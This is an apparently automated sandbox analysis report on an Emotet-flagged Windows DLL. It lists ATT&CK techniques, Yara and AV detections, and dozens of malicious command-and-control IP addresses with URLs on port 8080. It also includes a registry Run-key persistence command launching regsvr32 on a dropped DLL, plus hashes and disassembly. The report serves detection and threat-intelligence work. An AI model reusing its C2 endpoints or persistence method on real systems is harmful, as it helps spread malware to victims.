                      Source: Yara matchFile source: 00000003.00000002.276448850.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.275026847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.279054004.000001B000100000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.272245824.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.423610573.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.651143469.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.275144208.00000000009C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.659348475.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.276265667.0000025817DF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation11
                      Registry Run Keys / Startup Folder
                      111
                      Process Injection
                      21
                      Masquerading
                      OS Credential Dumping1
                      System Time Discovery
                      Remote Services1
                      Archive Collected Data
                      Exfiltration Over Other Network Medium2
                      Encrypted Channel
                      Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsScheduled Task/Job1
                      DLL Side-Loading
                      11
                      Registry Run Keys / Startup Folder
                      1
                      Virtualization/Sandbox Evasion
                      LSASS Memory21
                      Security Software Discovery
                      Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
                      Application Layer Protocol
                      Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)1
                      DLL Side-Loading
                      111
                      Process Injection
                      Security Account Manager1
                      Virtualization/Sandbox Evasion
                      SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
                      Hidden Files and Directories
                      NTDS2
                      Process Discovery
                      Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                      Obfuscated Files or Information
                      LSA Secrets1
                      Remote System Discovery
                      SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.common1
                      Regsvr32
                      Cached Domain Credentials2
                      File and Directory Discovery
                      VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                      Rundll32
                      DCSync24
                      System Information Discovery
                      Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                      DLL Side-Loading
                      Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                      File Deletion
                      /etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 745034 Sample: gdazhx1EIP.dll Startdate: 13/11/2022 Architecture: WINDOWS Score: 84 40 103.224.241.74 WEBWERKS-AS-INWebWerksIndiaPvtLtdIN India 2->40 42 210.57.209.142 UNAIR-AS-IDUniversitasAirlanggaID Indonesia 2->42 44 45 other IPs or domains 2->44 52 Snort IDS alert for network traffic 2->52 54 Multi AV Scanner detection for submitted file 2->54 56 Yara detected Emotet 2->56 58 C2 URLs / IPs found in malware configuration 2->58 9 loaddll64.exe 3 2->9         started        12 regsvr32.exe 2 2->12         started        signatures3 process4 signatures5 60 Hides that the sample has been downloaded from the Internet (zone.identifier) 9->60 14 cmd.exe 1 9->14         started        16 rundll32.exe 2 9->16         started        19 regsvr32.exe 2 9->19         started        23 2 other processes 9->23 21 regsvr32.exe 12->21         started        process6 signatures7 25 rundll32.exe 2 14->25         started        46 Hides that the sample has been downloaded from the Internet (zone.identifier) 16->46 28 regsvr32.exe 16->28         started        30 regsvr32.exe 19->30         started        process8 signatures9 62 Hides that the sample has been downloaded from the Internet (zone.identifier) 25->62 32 regsvr32.exe 1 25->32         started        process10 dnsIp11 36 115.178.55.22, 49700, 80 SIMAYA-AS-IDPTSimayaJejaringMandiriID Indonesia 32->36 38 172.105.115.71, 49701, 8080 LINODE-APLinodeLLCUS United States 32->38 48 System process connects to network (likely due to code injection or exploit) 32->48 50 Creates an autostart registry key pointing to binary in C:\Windows 32->50 signatures12

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      gdazhx1EIP.dll44%VirustotalBrowse
                      No Antivirus matches
                      SourceDetectionScannerLabelLinkDownload
                      19.2.regsvr32.exe.ef0000.0.unpack100%AviraHEUR/AGEN.1215461Download File
                      5.2.rundll32.exe.25817df0000.0.unpack100%AviraHEUR/AGEN.1215461Download File
                      3.2.regsvr32.exe.9c0000.0.unpack100%AviraHEUR/AGEN.1215461Download File
                      0.2.loaddll64.exe.1b000100000.0.unpack100%AviraHEUR/AGEN.1215461Download File
                      6.2.regsvr32.exe.ad0000.0.unpack100%AviraHEUR/AGEN.1215461Download File
                      4.2.rundll32.exe.1e1da4c0000.0.unpack100%AviraHEUR/AGEN.1215461Download File
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      https://172.105.115.71:8080/mcxnkbajti/0%Avira URL Cloudsafe
                      https://172.105.115.71:8080/s.dll0%Avira URL Cloudsafe
                      No contacted domains info
                      NameSourceMaliciousAntivirus DetectionReputation
                      https://172.105.115.71:8080/mcxnkbajti/regsvr32.exe, 00000006.00000003.513448878.0000000000B93000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://172.105.115.71:8080/s.dllregsvr32.exe, 00000006.00000002.652463678.0000000000B77000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.513260146.0000000000B77000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.513417805.0000000000B77000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs
                      IPDomainCountryFlagASNASN NameMalicious
                      172.105.115.71
                      unknownUnited States
                      63949LINODE-APLinodeLLCUStrue
                      188.165.79.151
                      unknownFrance
                      16276OVHFRtrue
                      196.44.98.190
                      unknownGhana
                      327814EcobandGHtrue
                      174.138.33.49
                      unknownUnited States
                      14061DIGITALOCEAN-ASNUStrue
                      36.67.23.59
                      unknownIndonesia
                      17974TELKOMNET-AS2-APPTTelekomunikasiIndonesiaIDtrue
                      103.41.204.169
                      unknownIndonesia
                      58397INFINYS-AS-IDPTInfinysSystemIndonesiaIDtrue
                      85.214.67.203
                      unknownGermany
                      6724STRATOSTRATOAGDEtrue
                      83.229.80.93
                      unknownUnited Kingdom
                      8513SKYVISIONGBtrue
                      198.199.70.22
                      unknownUnited States
                      14061DIGITALOCEAN-ASNUStrue
                      93.104.209.107
                      unknownGermany
                      8767MNET-ASGermanyDEtrue
                      186.250.48.5
                      unknownBrazil
                      262807RedfoxTelecomunicacoesLtdaBRtrue
                      209.239.112.82
                      unknownUnited States
                      30083AS-30083-GO-DADDY-COM-LLCUStrue
                      175.126.176.79
                      unknownKorea Republic of
                      9523MOKWON-AS-KRMokwonUniversityKRtrue
                      128.199.242.164
                      unknownUnited Kingdom
                      14061DIGITALOCEAN-ASNUStrue
                      178.238.225.252
                      unknownGermany
                      51167CONTABODEtrue
                      46.101.98.60
                      unknownNetherlands
                      14061DIGITALOCEAN-ASNUStrue
                      190.145.8.4
                      unknownColombia
                      14080TelmexColombiaSACOtrue
                      82.98.180.154
                      unknownSpain
                      42612DINAHOSTING-ASEStrue
                      103.71.99.57
                      unknownIndia
                      135682AWDHPL-AS-INAdvikaWebDevelopmentsHostingPvtLtdINtrue
                      87.106.97.83
                      unknownGermany
                      8560ONEANDONE-ASBrauerstrasse48DEtrue
                      103.254.12.236
                      unknownViet Nam
                      56151DIGISTAR-VNDigiStarCompanyLimitedVNtrue
                      103.85.95.4
                      unknownIndonesia
                      136077IDNIC-UNSRAT-AS-IDUniversitasIslamNegeriMataramIDtrue
                      202.134.4.210
                      unknownIndonesia
                      7713TELKOMNET-AS-APPTTelekomunikasiIndonesiaIDtrue
                      165.22.254.236
                      unknownUnited States
                      14061DIGITALOCEAN-ASNUStrue
                      78.47.204.80
                      unknownGermany
                      24940HETZNER-ASDEtrue
                      118.98.72.86
                      unknownIndonesia
                      7713TELKOMNET-AS-APPTTelekomunikasiIndonesiaIDtrue
                      139.59.80.108
                      unknownSingapore
                      14061DIGITALOCEAN-ASNUStrue
                      104.244.79.94
                      unknownUnited States
                      53667PONYNETUStrue
                      37.44.244.177
                      unknownGermany
                      47583AS-HOSTINGERLTtrue
                      51.75.33.122
                      unknownFrance
                      16276OVHFRtrue
                      160.16.143.191
                      unknownJapan9370SAKURA-BSAKURAInternetIncJPtrue
                      103.56.149.105
                      unknownIndonesia
                      55688BEON-AS-IDPTBeonIntermediaIDtrue
                      85.25.120.45
                      unknownGermany
                      8972GD-EMEA-DC-SXB1DEtrue
                      139.196.72.155
                      unknownChina
                      37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdtrue
                      115.178.55.22
                      unknownIndonesia
                      38783SIMAYA-AS-IDPTSimayaJejaringMandiriIDtrue
                      103.126.216.86
                      unknownBangladesh
                      138482SKYVIEW-AS-APSKYVIEWONLINELTDBDtrue
                      128.199.217.206
                      unknownUnited Kingdom
                      14061DIGITALOCEAN-ASNUStrue
                      114.79.130.68
                      unknownIndia
                      45769DVOIS-IND-VoisBroadbandPvtLtdINtrue
                      103.224.241.74
                      unknownIndia
                      133296WEBWERKS-AS-INWebWerksIndiaPvtLtdINtrue
                      210.57.209.142
                      unknownIndonesia
                      38142UNAIR-AS-IDUniversitasAirlanggaIDtrue
                      202.28.34.99
                      unknownThailand
                      9562MSU-TH-APMahasarakhamUniversityTHtrue
                      80.211.107.116
                      unknownItaly
                      31034ARUBA-ASNITtrue
                      54.37.228.122
                      unknownFrance
                      16276OVHFRtrue
                      218.38.121.17
                      unknownKorea Republic of
                      9318SKB-ASSKBroadbandCoLtdKRtrue
                      185.148.169.10
                      unknownGermany
                      44780EVERSCALE-ASDEtrue
                      195.77.239.39
                      unknownSpain
                      60493FICOSA-ASEStrue
                      178.62.112.199
                      unknownEuropean Union
                      14061DIGITALOCEAN-ASNUStrue
                      62.171.178.147
                      unknownUnited Kingdom
                      51167CONTABODEtrue
                      64.227.55.231
                      unknownUnited States
                      14061DIGITALOCEAN-ASNUStrue
                      Joe Sandbox Version:36.0.0 Rainbow Opal
                      Analysis ID:745034
                      Start date and time:2022-11-13 18:11:38 +01:00
                      Joe Sandbox Product:CloudBasic
                      Overall analysis duration:0h 10m 31s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Sample file name:gdazhx1EIP.dll
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                      Run name:Run with higher sleep bypass
                      Number of analysed new started processes analysed:26
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • HDC enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Detection:MAL
                      Classification:mal84.troj.evad.winDLL@21/2@0/49
                      EGA Information:
                      • Successful, ratio: 100%
                      HDC Information:
                      • Successful, ratio: 58.8% (good quality ratio 53.4%)
                      • Quality average: 60.9%
                      • Quality standard deviation: 31.8%
                      HCA Information:
                      • Successful, ratio: 99%
                      • Number of executed functions: 58
                      • Number of non-executed functions: 170
                      Cookbook Comments:
                      • Found application associated with file extension: .dll
                      • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                      • Excluded IPs from analysis (whitelisted): 67.26.75.254, 8.238.88.248, 8.253.95.120, 8.238.85.254, 8.253.207.120
                      • Excluded domains from analysis (whitelisted): fg.download.windowsupdate.com.c.footprint.net, fs.microsoft.com, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net
                      • Not all processes where analyzed, report is missing behavior information
                      • Report creation exceeded maximum time and may have missing disassembly code information.
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      TimeTypeDescription
                      18:13:37AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run PBid.dll C:\Windows\system32\regsvr32.exe "C:\Windows\system32\AEDSEwQF\PBid.dll"
                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      172.105.115.71UNUy8dUYWp.dllGet hashmaliciousBrowse
                        gdazhx1EIP.dllGet hashmaliciousBrowse
                          UNUy8dUYWp.dllGet hashmaliciousBrowse
                            3sbn8ZI5nn.dllGet hashmaliciousBrowse
                              3sbn8ZI5nn.dllGet hashmaliciousBrowse
                                zzkCIdCoDt.dllGet hashmaliciousBrowse
                                  zzkCIdCoDt.dllGet hashmaliciousBrowse
                                    U9M1w8FHBW.dllGet hashmaliciousBrowse
                                      En3ZIyuYdw.dllGet hashmaliciousBrowse
                                        Kjx74pqege.dllGet hashmaliciousBrowse
                                          U9M1w8FHBW.dllGet hashmaliciousBrowse
                                            En3ZIyuYdw.dllGet hashmaliciousBrowse
                                              Kjx74pqege.dllGet hashmaliciousBrowse
                                                mqMIxHWdwe.dllGet hashmaliciousBrowse
                                                  i590SBAZAI.dllGet hashmaliciousBrowse
                                                    rbh8gbxi93.dllGet hashmaliciousBrowse
                                                      aukDPlAxnc.dllGet hashmaliciousBrowse
                                                        Hjz5QKa9UZ.dllGet hashmaliciousBrowse
                                                          eki0vpuCvx.dllGet hashmaliciousBrowse
                                                            mqMIxHWdwe.dllGet hashmaliciousBrowse
                                                              188.165.79.151UNUy8dUYWp.dllGet hashmaliciousBrowse
                                                                gdazhx1EIP.dllGet hashmaliciousBrowse
                                                                  UNUy8dUYWp.dllGet hashmaliciousBrowse
                                                                    3sbn8ZI5nn.dllGet hashmaliciousBrowse
                                                                      3sbn8ZI5nn.dllGet hashmaliciousBrowse
                                                                        zzkCIdCoDt.dllGet hashmaliciousBrowse
                                                                          zzkCIdCoDt.dllGet hashmaliciousBrowse
                                                                            U9M1w8FHBW.dllGet hashmaliciousBrowse
                                                                              En3ZIyuYdw.dllGet hashmaliciousBrowse
                                                                                Kjx74pqege.dllGet hashmaliciousBrowse
                                                                                  U9M1w8FHBW.dllGet hashmaliciousBrowse
                                                                                    Kjx74pqege.dllGet hashmaliciousBrowse
                                                                                      mqMIxHWdwe.dllGet hashmaliciousBrowse
                                                                                        i590SBAZAI.dllGet hashmaliciousBrowse
                                                                                          rbh8gbxi93.dllGet hashmaliciousBrowse
                                                                                            aukDPlAxnc.dllGet hashmaliciousBrowse
                                                                                              Hjz5QKa9UZ.dllGet hashmaliciousBrowse
                                                                                                eki0vpuCvx.dllGet hashmaliciousBrowse
                                                                                                  mqMIxHWdwe.dllGet hashmaliciousBrowse
                                                                                                    i590SBAZAI.dllGet hashmaliciousBrowse
                                                                                                      No context
                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                      LINODE-APLinodeLLCUSUNUy8dUYWp.dllGet hashmaliciousBrowse
                                                                                                      • 172.105.115.71
                                                                                                      gdazhx1EIP.dllGet hashmaliciousBrowse
                                                                                                      • 172.105.115.71
                                                                                                      UNUy8dUYWp.dllGet hashmaliciousBrowse
                                                                                                      • 172.105.115.71
                                                                                                      3sbn8ZI5nn.dllGet hashmaliciousBrowse
                                                                                                      • 172.105.115.71
                                                                                                      3sbn8ZI5nn.dllGet hashmaliciousBrowse
                                                                                                      • 172.105.115.71
                                                                                                      zzkCIdCoDt.dllGet hashmaliciousBrowse
                                                                                                      • 172.105.115.71
                                                                                                      zzkCIdCoDt.dllGet hashmaliciousBrowse
                                                                                                      • 172.105.115.71
                                                                                                      U9M1w8FHBW.dllGet hashmaliciousBrowse
                                                                                                      • 172.105.115.71
                                                                                                      En3ZIyuYdw.dllGet hashmaliciousBrowse
                                                                                                      • 172.105.115.71
                                                                                                      Kjx74pqege.dllGet hashmaliciousBrowse
                                                                                                      • 172.105.115.71
                                                                                                      U9M1w8FHBW.dllGet hashmaliciousBrowse
                                                                                                      • 172.105.115.71
                                                                                                      En3ZIyuYdw.dllGet hashmaliciousBrowse
                                                                                                      • 172.105.115.71
                                                                                                      Kjx74pqege.dllGet hashmaliciousBrowse
                                                                                                      • 172.105.115.71
                                                                                                      mqMIxHWdwe.dllGet hashmaliciousBrowse
                                                                                                      • 172.105.115.71
                                                                                                      ozZDLYwvhE.dllGet hashmaliciousBrowse
                                                                                                      • 172.105.226.75
                                                                                                      i590SBAZAI.dllGet hashmaliciousBrowse
                                                                                                      • 172.105.115.71
                                                                                                      rbh8gbxi93.dllGet hashmaliciousBrowse
                                                                                                      • 172.105.115.71
                                                                                                      aukDPlAxnc.dllGet hashmaliciousBrowse
                                                                                                      • 172.105.115.71
                                                                                                      Hjz5QKa9UZ.dllGet hashmaliciousBrowse
                                                                                                      • 172.105.115.71
                                                                                                      eki0vpuCvx.dllGet hashmaliciousBrowse
                                                                                                      • 172.105.115.71
                                                                                                      OVHFRUNUy8dUYWp.dllGet hashmaliciousBrowse
                                                                                                      • 54.37.228.122
                                                                                                      gdazhx1EIP.dllGet hashmaliciousBrowse
                                                                                                      • 54.37.228.122
                                                                                                      UNUy8dUYWp.dllGet hashmaliciousBrowse
                                                                                                      • 54.37.228.122
                                                                                                      3sbn8ZI5nn.dllGet hashmaliciousBrowse
                                                                                                      • 54.37.228.122
                                                                                                      3sbn8ZI5nn.dllGet hashmaliciousBrowse
                                                                                                      • 54.37.228.122
                                                                                                      zzkCIdCoDt.dllGet hashmaliciousBrowse
                                                                                                      • 54.37.228.122
                                                                                                      zzkCIdCoDt.dllGet hashmaliciousBrowse
                                                                                                      • 54.37.228.122
                                                                                                      file.exeGet hashmaliciousBrowse
                                                                                                      • 5.135.247.111
                                                                                                      U9M1w8FHBW.dllGet hashmaliciousBrowse
                                                                                                      • 54.37.228.122
                                                                                                      En3ZIyuYdw.dllGet hashmaliciousBrowse
                                                                                                      • 54.37.228.122
                                                                                                      Kjx74pqege.dllGet hashmaliciousBrowse
                                                                                                      • 54.37.228.122
                                                                                                      U9M1w8FHBW.dllGet hashmaliciousBrowse
                                                                                                      • 54.37.228.122
                                                                                                      Kjx74pqege.dllGet hashmaliciousBrowse
                                                                                                      • 54.37.228.122
                                                                                                      mqMIxHWdwe.dllGet hashmaliciousBrowse
                                                                                                      • 54.37.228.122
                                                                                                      ozZDLYwvhE.dllGet hashmaliciousBrowse
                                                                                                      • 94.23.45.86
                                                                                                      i590SBAZAI.dllGet hashmaliciousBrowse
                                                                                                      • 54.37.228.122
                                                                                                      rbh8gbxi93.dllGet hashmaliciousBrowse
                                                                                                      • 54.37.228.122
                                                                                                      aukDPlAxnc.dllGet hashmaliciousBrowse
                                                                                                      • 54.37.228.122
                                                                                                      Hjz5QKa9UZ.dllGet hashmaliciousBrowse
                                                                                                      • 54.37.228.122
                                                                                                      eki0vpuCvx.dllGet hashmaliciousBrowse
                                                                                                      • 54.37.228.122
                                                                                                      No context
                                                                                                      No context
                                                                                                      Process:C:\Windows\System32\regsvr32.exe
                                                                                                      File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 62919 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                                      Category:dropped
                                                                                                      Size (bytes):62919
                                                                                                      Entropy (8bit):7.995280921994772
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:1536:d+OfVxHl7Wyf11lYom3xQcRVOtPHwQV4rP6Ji7:d+OxHxJlZcuPt4b6q
                                                                                                      MD5:3DCF580A93972319E82CAFBC047D34D5
                                                                                                      SHA1:8528D2A1363E5DE77DC3B1142850E51EAD0F4B6B
                                                                                                      SHA-256:40810E31F1B69075C727E6D557F9614D5880112895FF6F4DF1767E87AE5640D1
                                                                                                      SHA-512:98384BE7218340F95DAE88D1CB865F23A0B4E12855BEB6E74A3752274C9B4C601E493864DB777BCA677A370D0A9DBFFD68D94898A82014537F3A801CCE839C42
                                                                                                      Malicious:false
                                                                                                      Preview:MSCF............,...................I.......Q.........GU.\ .authroot.stl..O..5..CK..<Tk...c_.d....A.K...+.d.-;%.BJII!.QIR..$t)Kd.-QQ*...g......^..~|N=...y....{. .4{...W....b.i...j.I.......1:..b\.0.....Ait.2t......w.%.&.",tL_...4.8L[G..;.57....AT.k.......V..K......(....mzS...G....r.".=H.?>.........x&...S%....X.M^..j...A..x.9`.9...A../.s..#.4#.....Id.w..B....s.8..(...dj....=L.)..s.d.]NxQX8....stV#.K.'7.tH..9u~.2..!..2./.....!..9C../...mP $..../y.....@p.6.}.`...5. 0r.w...@(.. .Q....)g.........m..z*.8rR..).].T9r<.L....0..`.........c.....;-.g..;.wk.)......i..c5.....{v.u...AS..=.....&.:.........+..P.N..9..EAQ.V.$s.......B.`.Mfe..8.......$...y-.q9J........W...2.Q8...O.......i..@\^.=X..dG$.M..#=....m.h..{9.'...-.v..Z...!....z.....N....i..^..,........d...%Xa~q.@D|0...Y.m...........&d.4..A..{t=...../.t.3._.....?-.....uroP?.d.Z..S..{...$.i....X..$.O..4..N.)....U.Z..P....X,.... ...Lg..35..W..s.!c...Ap.].P..8..M..W.......U..,...m.u..|=.m1..~..!..b...._.
                                                                                                      Process:C:\Windows\System32\regsvr32.exe
                                                                                                      File Type:data
                                                                                                      Category:modified
                                                                                                      Size (bytes):328
                                                                                                      Entropy (8bit):3.1108374798811247
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6:kKnHN1HlNiN+SkQlPlEGYRMY9z+4KlDA3RUeKlTAlWRyf1:Pt/kPlE99SNxAhUexYo1
                                                                                                      MD5:A2A90CBAC74BEA41A621D9519A65CDF0
                                                                                                      SHA1:B1E4336038698E875FD0A03003ABB7BCFE8A7F00
                                                                                                      SHA-256:7864F5FF677633EE938CF2761BCF0D57C36EF471349ABF7450527A7981AEFC92
                                                                                                      SHA-512:4D6AED0EBD989E1931FC8DFFDE1951CCB3A22289C229F91E8D9C71EBBA57614BD623D6A5FBA7CE62C06395752222C15CD6127EF64B8AFE2977D23AC1B0387DC2
                                                                                                      Malicious:false
                                                                                                      Preview:p...... .........Y<.....(....................................................... ..................&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.e.d.e.4.d.3.9.b.e.8.d.8.1.:.0."...
                                                                                                      File type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                      Entropy (8bit):6.619145958407103
                                                                                                      TrID:
                                                                                                      • Win64 Dynamic Link Library (generic) (102004/3) 86.43%
                                                                                                      • Win64 Executable (generic) (12005/4) 10.17%
                                                                                                      • Generic Win/DOS Executable (2004/3) 1.70%
                                                                                                      • DOS Executable Generic (2002/1) 1.70%
                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.01%
                                                                                                      File name:gdazhx1EIP.dll
                                                                                                      File size:528896
                                                                                                      MD5:6b304d058ae0788762f8924d2cad7ef5
                                                                                                      SHA1:f416b3c02d4f1746f8a642af253ee0d903b7b083
                                                                                                      SHA256:5b2039d5a1ba30d90ecd085eb135635f9830f4ae88472e779267e033f7eb4547
                                                                                                      SHA512:bb942317497f33c6ba9dfee3e824dacfd59329c1c70949623c0a7850bbfed66ddc8a839814e1e0265de111551a658288c40caa04fc7d3419b35e70afec198706
                                                                                                      SSDEEP:6144:mW1239bnTe+0Qv7NSEBj43USaI6Y/jOpxHRikSYI+QALgIJ1divndEX0n:mW1e9PeexPBjvKSpuvYI+TLgs1dcEX0
                                                                                                      TLSH:23B4F829A59E76F0C951A1F5A0420B1595F33C88FEF68EAF03502F296F6F24425F768C
                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................$...s...$...............................$.......$...............`.......`.......e.h.....`.......Rich...........
                                                                                                      Icon Hash:74f0e4ecccdce0e4
                                                                                                      Entrypoint:0x1800044e0
                                                                                                      Entrypoint Section:.text
                                                                                                      Digitally signed:false
                                                                                                      Imagebase:0x180000000
                                                                                                      Subsystem:windows gui
                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, DLL
                                                                                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
                                                                                                      Time Stamp:0x636D6724 [Thu Nov 10 21:03:32 2022 UTC]
                                                                                                      TLS Callbacks:
                                                                                                      CLR (.Net) Version:
                                                                                                      OS Version Major:6
                                                                                                      OS Version Minor:0
                                                                                                      File Version Major:6
                                                                                                      File Version Minor:0
                                                                                                      Subsystem Version Major:6
                                                                                                      Subsystem Version Minor:0
                                                                                                      Import Hash:81146e0614ccc4eb7174ad2ad695dedb
                                                                                                      Instruction
                                                                                                      dec eax
                                                                                                      mov dword ptr [esp+08h], ebx
                                                                                                      dec eax
                                                                                                      mov dword ptr [esp+10h], esi
                                                                                                      push edi
                                                                                                      dec eax
                                                                                                      sub esp, 20h
                                                                                                      dec ecx
                                                                                                      mov edi, eax
                                                                                                      mov ebx, edx
                                                                                                      dec eax
                                                                                                      mov esi, ecx
                                                                                                      cmp edx, 01h
                                                                                                      jne 00007F98B072D347h
                                                                                                      call 00007F98B072D8D8h
                                                                                                      dec esp
                                                                                                      mov eax, edi
                                                                                                      mov edx, ebx
                                                                                                      dec eax
                                                                                                      mov ecx, esi
                                                                                                      dec eax
                                                                                                      mov ebx, dword ptr [esp+30h]
                                                                                                      dec eax
                                                                                                      mov esi, dword ptr [esp+38h]
                                                                                                      dec eax
                                                                                                      add esp, 20h
                                                                                                      pop edi
                                                                                                      jmp 00007F98B072D1BCh
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      inc eax
                                                                                                      push ebx
                                                                                                      dec eax
                                                                                                      sub esp, 20h
                                                                                                      dec eax
                                                                                                      mov ebx, ecx
                                                                                                      dec eax
                                                                                                      mov eax, edx
                                                                                                      dec eax
                                                                                                      lea ecx, dword ptr [00033F0Dh]
                                                                                                      dec eax
                                                                                                      mov dword ptr [ebx], ecx
                                                                                                      dec eax
                                                                                                      lea edx, dword ptr [ebx+08h]
                                                                                                      xor ecx, ecx
                                                                                                      dec eax
                                                                                                      mov dword ptr [edx], ecx
                                                                                                      dec eax
                                                                                                      mov dword ptr [edx+08h], ecx
                                                                                                      dec eax
                                                                                                      lea ecx, dword ptr [eax+08h]
                                                                                                      call 00007F98B072FB41h
                                                                                                      dec eax
                                                                                                      lea eax, dword ptr [00033F1Dh]
                                                                                                      dec eax
                                                                                                      mov dword ptr [ebx], eax
                                                                                                      dec eax
                                                                                                      mov eax, ebx
                                                                                                      dec eax
                                                                                                      add esp, 20h
                                                                                                      pop ebx
                                                                                                      ret
                                                                                                      int3
                                                                                                      xor eax, eax
                                                                                                      dec eax
                                                                                                      mov dword ptr [ecx+10h], eax
                                                                                                      dec eax
                                                                                                      lea eax, dword ptr [00033F13h]
                                                                                                      dec eax
                                                                                                      mov dword ptr [ecx+08h], eax
                                                                                                      dec eax
                                                                                                      lea eax, dword ptr [00033EF8h]
                                                                                                      dec eax
                                                                                                      mov dword ptr [ecx], eax
                                                                                                      dec eax
                                                                                                      mov eax, ecx
                                                                                                      ret
                                                                                                      int3
                                                                                                      inc eax
                                                                                                      push ebx
                                                                                                      dec eax
                                                                                                      sub esp, 20h
                                                                                                      dec eax
                                                                                                      mov ebx, ecx
                                                                                                      dec eax
                                                                                                      mov eax, edx
